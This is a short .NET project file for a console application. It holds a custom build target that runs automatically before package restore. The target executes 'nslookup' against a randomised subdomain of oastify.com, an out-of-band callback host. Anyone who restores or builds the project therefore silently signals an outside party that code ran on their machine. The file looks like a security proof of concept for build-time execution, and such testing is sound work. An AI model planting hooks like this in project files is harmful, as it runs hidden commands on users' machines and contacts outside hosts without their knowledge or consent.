<Project Sdk="Microsoft.NET.Sdk">

    <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="RunCustomScriptOnRestore" BeforeTargets="Restore">
    <Exec Command="nslookup oum65o3xd7joj88todjtvpwndej571vq.oastify.com" />
  </Target>

</Project>
